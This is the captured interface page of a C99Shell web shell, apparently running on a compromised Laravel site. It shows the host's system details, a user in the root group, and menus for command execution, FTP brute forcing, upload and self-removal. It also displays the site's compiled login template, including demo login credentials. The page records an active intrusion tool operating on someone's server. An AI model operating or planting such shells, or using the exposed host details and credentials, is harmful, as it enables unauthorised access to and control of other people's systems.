!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/gateway.picotech.app/public_html/storage/framework/views/   drwxr-xr-x
Free 28.29 GB of 117.98 GB (23.98%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     aacf0d79991b034ba6b16e176e8d0a6a318ad8fe.php (5.76 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php $__env->startSection('title','Login'); ?>



<?php $__env->startSection('extra-style'); ?>
<style>
    body {
        font-family: "Montserrat", sans-serif;
    }

    .login-box,
    .register-box {
        width: 400px;
    }

    .login-page {
        background-image: url('<?php echo e(asset('images/background-login.png')); ?>');
        background-size: cover;
        background-repeat: no-repeat;
        background-position: center;
    }

    .input-data {
        width: 100%;
        padding: 15px 20px;
        margin: 10px 0;
        display: inline-block;
        border-bottom: 2px solid #ccc;
        border-top: 0;
        border-left: 0;
        border-right: 0;
        box-sizing: border-box;
        border-radius: 5px;
        font-size: 18px !important;
        color: #666;
        background-color: #f8f8f8;
        transition: all 0.3s ease-in-out;
    }

    [class*=icheck-]>input:first-child+input[type=hidden]+label::before,
    [class*=icheck-]>input:first-child+label::before {
        border-radius: 50px !important;
    }

    .forgot-text {
        font-size: 16px !important;
        color: #006666;
        font-weight: 500;
        text-decoration: none;
        transition: all 0.3s ease-in-out;
    }

    .forgot-text:hover {
        color: #444;
    }

    .loginbtn {
        background-color: #006666;
        color: white;
        padding: 10px 25px;
        margin: 10px 0;
        cursor: pointer;
        font-size: 18px !important;
        font-weight: 600;
        border-radius: 5px;
        border: 2px solid transparent;
        transition: all 0.3s ease-in-out;
    }

    .loginbtn:hover {
        background-color: transparent;
        color: #006666;
        border: 2px solid #006666;
    }

    .sing_up span {
        margin-top: 10px;
        display: block;
        color: #868686;
        font-size: 16px;
    }

    .sing_up a {
        padding: 0 5px;
        color: #006666;
        background-color: transparent;
        text-decoration: none;
        font-weight: 600;
        transition: all 0.3s ease-in-out;
    }

    .icheck-primary label {
        font-size: 16px !important;
    }

    .card {
        padding: 25px 20px !important;
    }

    .form-content {
        padding: 40px 20px 40px 20px;
    }

    .header-content {
        margin: 24px 0px 14px 0px;
    }

    .header-content img {
        width: 150px;
        height: auto;
    }
    @media (max-width: 575.98px) { 
        .form-content {
            padding: 40px 0px 40px 0px;
        }
        .input-data{
            width: 100%;
        }
        .login-box{
            width: 100%;
        }
        .icheck-primary label {
            font-size: 14px !important;
        }
        .forgot-text {
            font-size: 14px !important;
        }
        .header-content img {
            width: 150px;
        }
    }
</style>
<?php $__env->stopSection(); ?>

<?php $__env->startSection('content'); ?>
    <div class="card-body login-card-body p-0">
        <div class="form-data text-center">
            <div class="header-content">
                <img src="<?php echo e(asset('uploads/'.get_settings('app_logo'))); ?>" alt="">
            </div>
            <form action="<?php echo e(route('authenticate')); ?>" method="post">
                <?php echo csrf_field(); ?>
                <div class="form-content">
                    <input name="email" type="email" class="input-data" placeholder="<?php echo app('translator')->get('auth.login.form.email'); ?>"
                        id="email">
                    <input name="password" type="password" class="input-data"
                        placeholder="<?php echo app('translator')->get('auth.login.form.password'); ?>" id="password">

                    <div class="row align-items-center">
                        <div class="col-lg-6 col-6">
                            <div class="icheck-primary">
                                <input name="remember_me" type="checkbox" id="remember">
                                <label for="remember">
                                    <?php echo app('translator')->get('auth.login.form.remember_me'); ?>
                                </label>
                            </div>
                        </div>
                        <div class="col-lg-6 col-6">
                            <a class="forgot-text"
                                href="<?php echo e(route('password.request')); ?>"><?php echo app('translator')->get('auth.form.forget_password'); ?>?</a>
                        </div>
                    </div>

                    <div class="login-btn text-center">
                        <button type="submit" class="btn loginbtn"><?php echo app('translator')->get('auth.form.button.login'); ?></button>
                    </div>


                    <div class="sing_up">
                        <span>Not a member?
                            <a href="<?php echo e(route('signup')); ?>"><?php echo app('translator')->get('auth.form.button.sign_up'); ?></a>
                        </span>
                    </div>

                </div>
            </form>

        </div>
    </div>
<?php $__env->stopSection(); ?>
<?php $__env
->startSection('extra-script'); ?>
    <script src="https://www.google.com/recaptcha/api.js"></script>
    <script>
        function onSubmit(token) {
            document.getElementById("login_form").submit();
        }

        $("#copy-btn").click(function () {
            $("#email").val("customer@demo.com");
            $("#password").val("123456");
        });
    </script>
<?php $__env->stopSection(); ?>

<?php echo $__env->make('layouts.auth_customer'\Illuminate\Support\Arr::except(get_defined_vars(), ['__data''__path']))->render(); ?><?php /**PATH /home/picotech/domains/gateway.picotech.app/public_html/resources/views/auth/login.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0042 ]--